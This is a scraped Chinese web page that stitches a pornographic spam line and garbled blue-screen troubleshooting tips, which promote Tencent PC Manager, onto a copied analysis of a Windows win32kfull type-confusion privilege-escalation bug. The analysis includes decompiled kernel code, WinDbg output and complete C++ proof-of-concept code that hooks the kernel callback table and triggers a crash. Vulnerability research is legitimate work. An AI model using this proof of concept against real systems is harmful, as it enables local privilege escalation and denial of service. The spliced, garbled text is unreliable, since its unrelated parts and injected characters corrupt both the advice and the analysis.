damoshayu.cn,苍井空浴缸大战猛男120分钟,网址你懂的,中国女人内射6XXXXXWWW

win7 藍(lán)屏 7b

前沿拓展:

win7 藍(lán)屏 7b

電腦藍(lán)屏的原因多種多樣,樓主可以按照我告訴你的方法一一排除試一試
1、散熱不良,給風(fēng)扇除塵,上油,或更換風(fēng)扇,臺(tái)式機(jī)在鐵陸比紀(jì)主機(jī)機(jī)箱內(nèi)加個(gè)臨時(shí)風(fēng)扇 ,輔助套須散熱,本本加散熱墊。
2、機(jī)器內(nèi)灰塵過(guò)多,接觸不良,清潔機(jī)箱,將所有的連接插緊、插牢。
3、內(nèi)存里談跟門散條松動(dòng),拔下內(nèi)存,清理插槽,擦干凈內(nèi)存金手指,再眾進(jìn)影牛保井治司插緊。
4、檢查修復(fù)磁盤錯(cuò)誤??梢允褂抿v訊電腦管家去體檢,打開(kāi)騰訊電腦管家–首頁(yè)–體檢
5、清理磁盤整理磁盤碎臉單紀(jì)片。用騰訊電腦管家來(lái)清理下電腦垃圾就可以了,打開(kāi)騰訊電腦管家–清理垃圾–開(kāi)始掃描–完成。
6、硬盤老化或由世萬(wàn)講家德魯于使用不當(dāng)造成壞道、壞扇區(qū),要用工具軟件來(lái)進(jìn)行排障處理,如損壞嚴(yán)重則要代更換硬盤。樓主可以使用騰訊電腦管家來(lái)檢測(cè)一下,打開(kāi)騰訊電腦管家–工具箱–硬件檢測(cè)
7、啟動(dòng)的程序太維在眾知素多,使系統(tǒng)資源消耗殆盡,導(dǎo)致系航率拿統(tǒng)資源不足,引起系統(tǒng)藍(lán)內(nèi)氣屏。建議樓主適當(dāng)關(guān)閉軟件,打開(kāi)騰訊電腦管家–工具箱–進(jìn)程管理器–對(duì)不需要的軟件進(jìn)行禁止。
8、殺過(guò)除木馬**??梢允褂抿v訊電腦管家來(lái)進(jìn)行殺毒,打開(kāi)騰訊電腦管附踐類寬改情展波判里伯家–閃電殺毒–全盤掃描–完成


漏洞描述

內(nèi)核模塊win32kfull.syswin32kfull!xxxClientAllocWindowClassExtraBytes函數(shù)中存在Type Confusion漏洞,利用此漏洞進(jìn)行越界讀寫(xiě),最終可實(shí)現(xiàn)本地提權(quán)

官方通報(bào)影響的windows版本:

Windows 10 Version 1803/1809/1909/2004/20h2

Windows Server, version 1909/20H2(Server Core installation)

Windows 10 Version for 32-bit Systems

Windows Server 2019

漏洞分析

分析Windows版本:win10 20h2 19042.508

Type Confusion漏洞存在于win32kfull!xxxCreateWindowEx函數(shù)中,函數(shù)中漏洞點(diǎn)的偽代碼如下:

win7 藍(lán)屏 7b

漏洞是怎么出現(xiàn)的呢?這得從窗口創(chuàng)建說(shuō)起

【→所有資源關(guān)注我,私信回復(fù)“資料”獲取←】1、網(wǎng)絡(luò)安全學(xué)習(xí)路線2、電子書(shū)籍(白帽子)3、安全大廠內(nèi)部視頻4、100份src文檔5、常見(jiàn)安全面試題6、ctf大賽經(jīng)典題目解析7、**工具包8、應(yīng)急響應(yīng)筆記

創(chuàng)建一個(gè)自定義的窗口前需要注冊(cè)自定義的窗口類,窗口類的結(jié)構(gòu)體如下:

typedef struct tagWNDCLASSA {
UINT style;
WNDPROC lpfnWndProc;
int cbClsExtra;
int cbWndExtra;
HINSTANCE hInstance;
HICON hIcon;
HCURSOR hCursor;
HBRUSH hbrBackground;
LPCSTR lpszMenuName;
LPCSTR lpszClassName;
} WNDCLASSA, *PWNDCLASSA, *NPWNDCLASSA, *LPWNDCLASSA;

填寫(xiě)好窗口類的結(jié)構(gòu)體的成員,緊接著就可以調(diào)用CreateWindow(EXA/W)創(chuàng)建窗口,R0到R3的執(zhí)行總體流程如下:

00 fffffe82`32d3f848 fffff467`52aa51a9 win32kfull!xxxCreateWindowEx
01 fffffe82`32d3f850 fffff467`5285519e win32kfull!NtUserCreateWindowEx+0x679
02 fffffe82`32d3f9f0 fffff802`36e058b5 win32k!NtUserCreateWindowEx+0xc2
03 fffffe82`32d3fa90 00007ffe`d86e1ec4 nt!KiSystemServiceCopyEnd+0x25
04 00000062`2ad9f7d8 00007ffe`d8ca7d8b win32u!NtUserCreateWindowEx+0x14
05 00000062`2ad9f7e0 00007ffe`d8ca7958 USER32!VerNtUserCreateWindowEx+0x20f
06 00000062`2ad9fb70 00007ffe`d8ca3c92 USER32!CreateWindowInternal+0x1a4
07 00000062`2ad9fcd0 00007ff7`9418144d USER32!CreateWindowExA+0x82

可以看到創(chuàng)建窗口的時(shí)候最終會(huì)進(jìn)入漏洞存在的函數(shù)win32kfull!xxxCreateWindowEx,那么怎樣才能在win32kfull!xxxCreateWindowEx內(nèi)調(diào)用win32kfull!xxxClientAllocWindowClassExtraBytes(即到達(dá)上圖中l(wèi)ine: 974)呢?

當(dāng)tagWNDCLASSA類設(shè)置cbWndExtra成員(為窗口實(shí)例分配的額外的字節(jié)大小)不為0時(shí),就會(huì)調(diào)用到win32kfull!xxxClientAllocWindowClassExtraBytes函數(shù),問(wèn)題就出在這個(gè)函數(shù)中

v50是一個(gè)tagWND結(jié)構(gòu)體指針,tagWND在win10的版本中相比win7的版本發(fā)生了一些變化,tagWND結(jié)構(gòu)體的關(guān)鍵成員如下(圖片來(lái)源于紅雨滴團(tuán)隊(duì)),(_QWORD *)(*((_QWORD *)v50 + 5) + 0x128i64)即為下圖的pExtraBytes,在當(dāng)前正常的執(zhí)行流程中,賦值為win32kfull!xxxClientAllocWindowClassExtraBytes申請(qǐng)到的堆地址,怎么知道是堆地址呢?且看下文

win7 藍(lán)屏 7b

對(duì)函數(shù)win32kfull!xxxClientAllocWindowClassExtraBytes進(jìn)行反編譯,得到以下結(jié)果:

volatile void *__fastcall xxxClientAllocWindowClassExtraBytes(SIZE_T Length)
{
SIZE_T v1; // rdi
int v2; // ebx
__int64 *v3; // rcx
volatile void *v4; // rbx
__int64 CurrentProcessWow64Process; // rax
unsigned __int64 v7; // [rsp+30h] [rbp-38h] BYREF
volatile void *v8; // [rsp+38h] [rbp-30h]
char v9; // [rsp+70h] [rbp+8h] BYREF
char v10; // [rsp+78h] [rbp+10h] BYREF
int v11; // [rsp+80h] [rbp+18h] BYREF
int v12; // [rsp+88h] [rbp+20h] BYREF

v1 = (unsigned int)Length;
v7 = 0i64;
v11 = 0;
v8 = 0i64;
v12 = Length;
if ( gdwInAtomicOperation && (gdwExtraInstrumentations & 1) != 0 )
KeBugCheckEx(0x160u, gdwInAtomicOperation, 0i64, 0i64, 0i64);
ReleaseAndReacquirePerObjectLocks::ReleaseAndReacquirePerObjectLocks((ReleaseAndReacquirePerObjectLocks *)&v10);
LeaveEnterCritProperDisposition::LeaveEnterCritProperDisposition((LeaveEnterCritProperDisposition *)&v9);
EtwTraceBeginCallback(0x7Bi64);
v2 = KeUserModeCallback(0x7Bi64, &v12, 4i64, &v7, &v11);
EtwTraceEndCallback(0x7Bi64);
LeaveEnterCritProperDisposition::~LeaveEnterCritProperDisposition((LeaveEnterCritProperDisposition *)&v9);
ReleaseAndReacquirePerObjectLocks::~ReleaseAndReacquirePerObjectLocks((ReleaseAndReacquirePerObjectLocks *)&v10);
if ( v2 < 0 || v11 != 0x18 )
return 0i64;
v3 = (__int64 *)v7;
if ( v7 + 8 < v7 || v7 + 8 > MmUserProbeAddress )
v3 = (__int64 *)MmUserProbeAddress;
v8 = (volatile void *)*v3;
v4 = v8;
CurrentProcessWow64Process = PsGetCurrentProcessWow64Process();
ProbeForRead(v4, v1, CurrentProcessWow64Process != 0 ? 1 : 4);
return v4;
}

函數(shù)中調(diào)用KeUserModeCallback返回到用戶態(tài)執(zhí)行回調(diào)函數(shù),KeUserModeCallback函數(shù)原型如下:

NTSTATUS KeUserModeCallback (
IN ULONG ApiNumber,
IN PVOID InputBuffer,
IN ULONG InputLength,
OUT PVOID *OutputBuffer,
IN PULONG OutputLength
);

第一根據(jù)API號(hào)0x7b可確定回調(diào)函數(shù)為user32!_xxxClientAllocWindowClassExtraBytes

0: kd> dt ntdll!_PEB @$peb Ke*
+0x058 KernelCallbackTable : 0x00007fff`4e1e1070 Void
0: kd> u poi(0x00007fff`4e1e1070 + 7b * 8)
user32!_xxxClientAllocWindowClassExtraBytes:
00007fff`4e177840 4883ec48 sub rsp,48h
00007fff`4e177844 8364242800 and dword ptr [rsp+28h],0
00007fff`4e177849 488364243000 and qword ptr [rsp+30h],0
00007fff`4e17784f 448b01 mov r8d,dword ptr [rcx]
00007fff`4e177852 ba08000000 mov edx,8
00007fff`4e177857 488b0dd2b70800 mov rcx,qword ptr [user32!pUserHeap (00007fff`4e203030)]
00007fff`4e17785e 48ff154bb20600 call qword ptr [user32!_imp_RtlAllocateHeap (00007fff`4e1e2ab0)]
00007fff`4e177865 0f1f440000 nop dword ptr [rax+rax]

對(duì)user32!_xxxClientAllocWindowClassExtraBytes進(jìn)行反匯編,得到以下結(jié)果:

NTSTATUS __fastcall _xxxClientAllocWindowClassExtraBytes(unsigned int *a1)
{
PVOID Result; // [rsp+20h] [rbp-28h] BYREF
int v3; // [rsp+28h] [rbp-20h]
__int64 v4; // [rsp+30h] [rbp-18h]

v3 = 0;
v4 = 0i64;
Result = RtlAllocateHeap(pUserHeap, 8u, *a1);
return NtCallbackReturn(&Result, 0x18u, 0);
}

函數(shù)內(nèi)調(diào)用RtlAllocateHeap從pUserHeap所指的用戶堆空間申請(qǐng)*a1(Length)字節(jié)的空間,并通過(guò)NtCallbackReturn攜帶堆地址返回到內(nèi)核態(tài),NtCallbackReturn函數(shù)原型如下:

win7 藍(lán)屏 7b

因此我們可以獲得這樣的執(zhí)行流程

xxxClientAllocWindowClassExtraBytes > KeUserModeCallback > _xxxClientAllocWindowClassExtraBytes > NtCallbackReturn

以上都屬于正常的執(zhí)行流程,接下來(lái)講一下漏洞的產(chǎn)生過(guò)程

pExtraBytes(offset: 0x128)ExtraFlag(offset: 0xe8)標(biāo)志相關(guān):當(dāng)ExtraFlag & 0x800 == 0時(shí),pExtraBytes表示的是內(nèi)存指針,即上述的堆地址;當(dāng)ExtraFlag & 0x800 != 0時(shí),pExtraBytes表示的是內(nèi)存偏移

因?yàn)閳?zhí)行完win32kfull!xxxClientAllocWindowClassExtraBytes函數(shù),沒(méi)有對(duì)tagWND的ExtraFlag 進(jìn)行校驗(yàn),所以惡意攻擊者可以在回調(diào)函數(shù)內(nèi)將tagWNDExtraFlag 進(jìn)行ExtraFlag | 0x800,就會(huì)使pExtraBytes表示的是內(nèi)存偏移,不再表示為內(nèi)存地址,再惡意控制pExtraBytes的偏移,同樣調(diào)用NtCallbackReturn將偏移值返回給內(nèi)核,就可以發(fā)生越界讀寫(xiě),通過(guò)越界讀寫(xiě)進(jìn)而獲取讀寫(xiě)原語(yǔ),最終導(dǎo)致本地權(quán)限提升

win7 藍(lán)屏 7b

漏洞驗(yàn)證

漏洞驗(yàn)證關(guān)鍵的兩點(diǎn):

抵達(dá)漏洞的路徑觸發(fā)漏洞的環(huán)境

抵達(dá)漏洞的路徑:設(shè)置tagWNDCLASSA的cbWndExtra,調(diào)用CreateWindow創(chuàng)建窗口

觸發(fā)漏洞的環(huán)境:回調(diào)函數(shù)內(nèi)修改tagWND的ExtraFlag并且返回指定的偏移值

POC編寫(xiě)

在編寫(xiě)POC前,還需要搞清楚一些問(wèn)題:

在調(diào)用CreateWindow期間(函數(shù)沒(méi)有返回)如何獲取窗口句柄如何修改tagWND的ExtraFlag

問(wèn)題1:在參考了網(wǎng)上公開(kāi)的一些方法后,我選擇了一種重利用的方法,這跟池噴射后構(gòu)造指定大小的空洞來(lái)進(jìn)行控制分配有著相似的地方。簡(jiǎn)單來(lái)說(shuō),就是分配一定數(shù)量的窗口(窗口類相同),緊接著銷毀這些窗口,第二創(chuàng)建要觸發(fā)漏洞的窗口(窗口的pExtraBytes為特殊的數(shù)值),觸發(fā)漏洞的窗口就會(huì)被分配到某個(gè)剛剛銷毀的窗口所在的內(nèi)存區(qū)域。觸發(fā)漏洞的窗口完成占坑后,我們是怎么獲取到窗口句柄的呢?原來(lái)我們可以通過(guò)一開(kāi)始創(chuàng)建好的窗口的句柄泄露tagWND在用戶態(tài)的內(nèi)存指針,其首地址存儲(chǔ)的就是窗口句柄,偏移0xc8處存儲(chǔ)的是pExtraBytes,通過(guò)對(duì)特殊值的比較,就可以搜索到觸發(fā)漏洞的窗口的用戶態(tài)tagWND首地址,讀取其首地址的值,即可獲得其窗口句柄

問(wèn)題2:大神們發(fā)現(xiàn),win32kfull!xxxConsoleControl函數(shù)可以設(shè)置tagWND的ExtraFlag,調(diào)用此函數(shù)的用戶態(tài)API為NtUserConsoleControl

__int64 __fastcall xxxConsoleControl(int a1, struct _CONSOLE_PROCESS_INFO *a2, int a3)
{

v16 = (_QWORD *)ValidateHwnd(*(_QWORD *)a2);// 獲取tagWND的地址
v17 = (__int64)v16;

v18 = v16 + 5;// 獲取pwnd的地址(真正的tagWND)

// 若ExtraFlag & 0x800 != 0
if ( (*(_DWORD *)(*v18 + 0xE8i64) & 0x800) != 0 )
{
v23 = (_DWORD *)(*(_QWORD *)(*(_QWORD *)(v17 + 0x18) + 0x80i64) + *(_QWORD *)(v22 + 0x128));
}
else
{
// 從桌面堆進(jìn)行分配
v23 = (_DWORD *)DesktopAlloc(*(_QWORD *)(v17 + 0x18), *(unsigned int *)(v22 + 0xC8), 0i64);

if ( *(_QWORD *)(*v18 + 0x128i64) )
{
CurrentProcess = PsGetCurrentProcess();
v30 = *(_DWORD *)(*v18 + 0xC8i64);
v29 = *(const void **)(*v18 + 0x128i64);
memmove(v23, v29, v30);
if ( (*(_DWORD *)(CurrentProcess + 1124) & 0x40000008) == 0 )
xxxClientFreeWindowClassExtraBytes(v17, *(_QWORD *)(*(_QWORD *)(v17 + 40) + 0x128i64));
}
*(_QWORD *)(*v18 + 0x128i64) = (char *)v23 – *(_QWORD *)(*(_QWORD *)(v17 + 24) + 0x80i64);
}
if ( v23 )
{
*v23 = *((_DWORD *)a2 + 2);
v23[1] = *((_DWORD *)a2 + 3);
}

// 將ExtraFlag |= 0x800u
*(_DWORD *)(*v18 + 0xE8i64) |= 0x800u;
goto LABEL_33;
}

}

在上述問(wèn)題得以解決后,就可以愉快地編寫(xiě)POC了

獲取一些關(guān)鍵函數(shù)地址:HMValidateHandle函數(shù)可以根據(jù)窗口句柄獲取用戶態(tài)tagWND的地址,雖然它不是導(dǎo)出函數(shù),但是可以在I**enu函數(shù)所在的內(nèi)存區(qū)域進(jìn)行搜索;NtCallbackReturn函數(shù)可以將結(jié)果返回給內(nèi)核,上文已經(jīng)提及VOID InitFunction()
{
HMODULE hNtdll = LoadLibraryA("ntdll.dll"), hWin = LoadLibraryA("win32u.dll"), hUser = LoadLibraryA("user32.dll");

if (!hNtdll || !hWin || !hUser)
{
ErrorOutput("[-] Failed to load the ntdll.dll, win32u.dll, user32.dlln");
}

global::NtCallbackReturn = (pNtCallbackReturn)GetProcAddress(hNtdll, "NtCallbackReturn");
global::NtUserConsoleControl = (pNtUserConsoleControl)GetProcAddress(hWin, "NtUserConsoleControl");
if (!global::NtCallbackReturn || !global::NtUserConsoleControl)
{
ErrorOutput("[-] Failed to get NtCallbackReturn, NtUserConsoleControln");
}

PBYTE i**enu = (PBYTE)GetProcAddress(hUser, "I**enu");
if (!i**enu)
{
ErrorOutput("[-] Failed to get NtCallbackReturn, NtUserConsoleControln");
}

while (*i**enu++ != 0xe8);
global::HMValidateHandle = (pHMValidateHandle)(i**enu + 4 + (*(PLONG32)i**enu));

if (!global::HMValidateHandle)
{
ErrorOutput("[-] Failed to get HMValidateHandlen");
}
}調(diào)用VirtualProtect函數(shù)修改回調(diào)函數(shù)表所在的內(nèi)存頁(yè)的屬性,替換相應(yīng)的回調(diào)函數(shù)為自定義的回調(diào)函數(shù):__readgsqword(0x60)獲取到當(dāng)前進(jìn)程的PEB結(jié)構(gòu)地址,PEB結(jié)構(gòu)偏移0x58處就是KernelCallbackTable(回調(diào)函數(shù)表)3: kd> dt ntdll!_PEB KernelCallbackTable
+0x058 KernelCallbackTable : Ptr64 Voi**OID HookCallBack()
{
ULONG64 KernelCallbackTable = *(PULONG64)(__readgsqword(0x60) + 0x58);
if (!KernelCallbackTable)
{
printf("[-] Failed to get kernel callback tablen");
exit(1);
}

DWORD oldProtect = 0;
ULONG64 target = KernelCallbackTable + (0x7B * 8);

VirtualProtect((LPVOID)target, 0x100, PAGE_EXECUTE_READWRITE, &oldProtect);

global::orginCallBack = (pCallBack)(*(PULONG64)target);
*(PULONG64)target = (ULONG64)FakeCallBack;

VirtualProtect((LPVOID)target, 0x100, oldProtect, &oldProtect);
}自定義的回調(diào)函數(shù):NtCallbackReturn用于返回指定的偏移給內(nèi)核,調(diào)用方法仿照_xxxClientAllocWindowClassExtraBytes,NtUserConsoleControl的調(diào)用參數(shù)有一點(diǎn)講究,在內(nèi)核調(diào)用xxxConsoleControl之前調(diào)用的是NtUserConsoleControl,其中會(huì)有一些小檢查,即第一個(gè)參數(shù)不能大于6,第三個(gè)參數(shù)不能大于0x18win7 藍(lán)屏 7b

并且在xxxConsoleControl中還有一部分檢查,最終決定第一個(gè)參數(shù)為6,最后一個(gè)參數(shù)為0x10

win7 藍(lán)屏 7b

win7 藍(lán)屏 7b

VOID FakeCallBack(PULONG32 para)
{
if (*para == global::magicNum && global::flag)
{
printf("[+] Enter the fake callbackn");
HWND target = NULL;

for (ULONG32 idx = 2; idx < 20; ++idx)
{
if (*(PULONG64)(global::pWnds[idx] + 0xc8) == global::magicNum)
{
target = (HWND) * (PULONG64)global::pWnds[idx];
printf("[+] Find the target wnd handle: 0x%I64xn", (ULONG64)target);
printf("[+] Find the target wnd address: 0x%I64xn", (ULONG64)global::pWnds[idx]);
break;
}
}

// set flag
ULONG64 buffer1[2] = { (ULONG64)target, 0 };
global::NtUserConsoleControl(6, buffer1, 0x10);

// set offset
ULONG64 buffer2[3] = { 0x1234, 0, 0 };
global::NtCallbackReturn(buffer2, 0x18, 0);
}

return global::orginCallBack(para);
}窗口的創(chuàng)建與銷毀:先創(chuàng)建20個(gè)常規(guī)的窗口,利用HMValidateHandle泄露窗口地址,再釋放2~19號(hào)窗口(全部釋放也行),創(chuàng)建觸發(fā)漏洞窗口,最后將觸發(fā)漏洞的窗口進(jìn)行銷毀,即可觸發(fā)BSODint main()
{
InitFunction();
HookCallBack();

HINSTANCE hInstance = GetModuleHandleA(NULL);
WNDCLASSA wc{ 0 };
wc.lpfnWndProc = WindowProc;
wc.hInstance = hInstance;
wc.lpszClassName = "Normal";
wc.cbWndExtra = 0x10;

ATOM normalClass = RegisterClassA(&wc);
if (!normalClass)
{
ErrorOutput("[-] Failed to register normal classn");
}

wc.lpszClassName = "Magic";
wc.cbWndExtra = global::magicNum;
ATOM magicClass = RegisterClassA(&wc);
if (!magicClass)
{
ErrorOutput("[-] Failed to register magic classn");
}

for (ULONG32 idx = 0; idx < 20; ++idx)
{
global::hWnds[idx] = CreateWindowExA(0x8000000, "Normal", "NormalWnd", 0x8000000, 0, 0, 0, 0, 0, 0, hInstance, NULL);
if (!global::hWnds[idx])
{
ErrorOutput("[-] Failed to create normal windown");
}
global::pWnds[idx] = global::HMValidateHandle((HMENU)global::hWnds[idx], 1);
}

for (ULONG32 idx = 2; idx < 20; ++idx)
{
if (global::hWnds[idx])
{
DestroyWindow(global::hWnds[idx]);
}
}

global::flag = TRUE;
HWND hMagic = CreateWindowExA(0x8000000, "Magic", "MagicWnd", 0x8000000, 0, 0, 0, 0, 0, 0, hInstance, NULL);
if (!hMagic)
{
ErrorOutput("[-] Failed to create magic windown");
}

DestroyWindow(hMagic);
return 0;
}POC調(diào)試

在回調(diào)函數(shù)內(nèi)設(shè)置斷點(diǎn),根據(jù)命令行打印出來(lái)的指針查看內(nèi)存,可以看到首地址存儲(chǔ)的句柄,偏移0xc8處即為特殊的數(shù)值0xabcd

2: kd> dq 27dab7814c0 l20
0000027d`ab7814c0 00000000`00020350 00000000`000314c0
0000027d`ab7814d0 00000000`00000000 08000000`08000000
0000027d`ab7814e0 00007ff6`13040000 00000000`00000000
0000027d`ab7814f0 00000000`000012b0 00000000`00000000
0000027d`ab781500 00000000`00000000 00000000`00000000
0000027d`ab781510 00000000`00000000 00000000`00000000
0000027d`ab781520 00000000`00000000 00000000`00000000
0000027d`ab781530 00000000`00000000 00007ff6`130410a0
0000027d`ab781540 00000000`0000f160 00000000`00000000
0000027d`ab781550 00000000`00000000 00000000`00000000
0000027d`ab781560 00000000`00000000 00000000`00000000
0000027d`ab781570 00000000`00000000 00000000`00000000
0000027d`ab781580 00000000`00000000 00000000`0000abcd
0000027d`ab781590 00000000`00020221 00000000`00000000
0000027d`ab7815a0 00000000`00000000 00000001`00000000
0000027d`ab7815b0 00000000`00000000 00000000`00000000
2: kd> ? 0000027d`ab781588-0000027d`ab7814c0
Evaluate expression: 200 = 00000000`000000c8

跟蹤內(nèi)核中的xxxConsoleControl函數(shù),查看內(nèi)核中的窗口結(jié)構(gòu),函數(shù)沒(méi)執(zhí)行完時(shí),標(biāo)志ExtraFlag還沒(méi)有設(shè)置,一旦執(zhí)行完就設(shè)置了標(biāo)志ExtraFlag

2: kd> dq ffff8a5905879150 l10
ffff8a59`05879150 00000000`00020350 00000000`00000001
ffff8a59`05879160 ffff8a59`02ee48a0 ffff8f01`0b551de0
ffff8a59`05879170 ffff8a59`05879150 ffff8a59`012314c0
ffff8a59`05879180 00000000`000314c0 00000000`00000000
ffff8a59`05879190 00000000`00000000 00000000`00000000
ffff8a59`058791a0 00000000`00000000 00000000`00000000
ffff8a59`058791b0 00000000`00000000 ffff8a59`00830a80
ffff8a59`058791c0 00000000`00000000 00000000`00000000
2: kd> dq poi(@rax+28)
ffff8a59`012314c0 00000000`00020350 00000000`000314c0
ffff8a59`012314d0 00000000`00000000 08000000`08000000
ffff8a59`012314e0 00007ff6`13040000 00000000`00000000
ffff8a59`012314f0 00000000`000012b0 00000000`00000000
ffff8a59`01231500 00000000`00000000 00000000`00000000
ffff8a59`01231510 00000000`00000000 00000000`00000000
ffff8a59`01231520 00000000`00000000 00000000`00000000
ffff8a59`01231530 00000000`00000000 00007ff6`130410a0
2: kd> ? poi(poi(@rax+28) + e8)
Evaluate expression: 4294967296 = 00000001`00000000
2: kd> g
Break instruction exception – code 80000003 (first chance)
0033:00007fff`f6820192 cc int 3
1: kd> dq ffff8a59`012314c0+e8 L1
ffff8a59`012315a8 00000001`00100818
1: kd> ? 00000001`00100818 & 0x800
Evaluate expression: 2048 = 00000000`00000800

在xxxCreateWindowEx中調(diào)用win32kfull!xxxClientAllocWindowClassExtraBytes函數(shù)的下一條指令下斷點(diǎn)

win7 藍(lán)屏 7b

3: kd> ba e1 ffff8348`7883ce09
3: kd> g
Breakpoint 0 hit
win32kfull!xxxCreateWindowEx+0x1259:
ffff8348`7883ce09 488bc8 mov rcx,rax
3: kd> r rax
rax=0000000000001234

執(zhí)行完這個(gè)xxxCreateWindowEx函數(shù)后,繼續(xù)執(zhí)行poc中的DestroyWindow就會(huì)觸發(fā)藍(lán)屏

NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=00000000000c2000 rbx=0000000000000000 rcx=00000000000c2000
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80557e61cf1 rsp=fffff080407c6740 rbp=ffff8a5901200040
r8=ffff8a590113f000 r9=00000000014b92ca r10=ffff8a5901201234
r11=014b92ca3db812e6 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
nt!RtlpHpVsContextFree+0x41:
fffff805`57e61cf1 410fb74822 movzx ecx,word ptr [r8+22h] ds:ffff8a59`0113f022=????
Resetting default scope

STACK_TEXT:
fffff080`407c5b68 fffff805`580c7422 : ffff8a59`0113f022 00000000`00000003 fffff080`407c5cd0 fffff805`57f3bb20 : nt!DbgBreakPointWithStatus
fffff080`407c5b70 fffff805`580c6b12 : fffff805`00000003 fffff080`407c5cd0 fffff805`57ff3960 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
fffff080`407c5bd0 fffff805`57fdf327 : fffff805`582844f8 fffff805`580f0fb5 00000000`00000000 00000000`00000000 : nt!KeBugCheck2+0x952
fffff080`407c62d0 fffff805`58001663 : 00000000`00000050 ffff8a59`0113f022 00000000`00000000 fffff080`407c65b0 : nt!KeBugCheckEx+0x107
fffff080`407c6310 fffff805`57e90edf : fffff080`407f1000 00000000`00000000 00000000`00000000 ffff8a59`0113f022 : nt!MiSystemFault+0x1d6933
fffff080`407c6410 fffff805`57fed320 : 00000000`00000000 fffff805`57e84817 00000000`00000001 00000000`00000000 : nt!MmAccessFault+0x34f
fffff080`407c65b0 fffff805`57e61cf1 : ffffa10d`a650ec60 fffff805`5905208d 00000000`00000350 ffff8f01`0e353080 : nt!KiPageFault+0x360
fffff080`407c6740 fffff805`57f0b7fa : 00000000`00000008 fffff080`407c6840 00000000`00000008 00000000`00000003 : nt!RtlpHpVsContextFree+0x41
fffff080`407c67e0 fffff805`57f0b77c : ffff8a59`01200000 00000000`00000000 ffff8a59`01201234 00000000`000002a0 : nt!RtlpFreeHeapInternal+0x5a
fffff080`407c6860 ffff8a2a`1d249973 : 00000000`00001234 00000000`00000000 00000000`00000000 ffff8a59`05879150 : nt!RtlFreeHeap+0x3c
fffff080`407c68a0 ffff8a2a`1d2463be : ffff8a59`00693920 00000000`08000100 ffff8a59`02ee48a0 ffff8a59`05879150 : win32kfull!xxxFreeWindow+0x4bf
fffff080`407c69d0 ffff8a2a`1d319e3a : 00007ff6`13043474 00000000`00000000 00007ff6`13040000 00000000`00000020 : win32kfull!xxxDestroyWindow+0x3ae
fffff080`407c6ad0 fffff805`57ff0b18 : 0000027d`40000600 0000000a`00000000 ffffffff`ffe17b80 ffff8f01`0d3e6be0 : win32kfull!NtUserDestroyWindow+0x3a
fffff080`407c6b00 00007fff`f5cb23e4 : 00007ff6`1304151d 00000000`00000098 00000000`00000000 00007ff6`00000000 : nt!KiSystemServiceCopyEnd+0x28
000000d5`26dffd28 00007ff6`1304151d : 00000000`00000098 00000000`00000000 00007ff6`00000000 00000000`00000000 : win32u!NtUserDestroyWindow+0x14
000000d5`26dffd30 00000000`00000098 : 00000000`00000000 00007ff6`00000000 00000000`00000000 00000000`00000000 : poc!main+0x33d [D:SelfLearnC++ProjectExploitExploit2021-1732-EXP.cpp @ 170]
000000d5`26dffd38 00000000`00000000 : 00007ff6`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x98

拓展知識(shí):

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http:///132313.html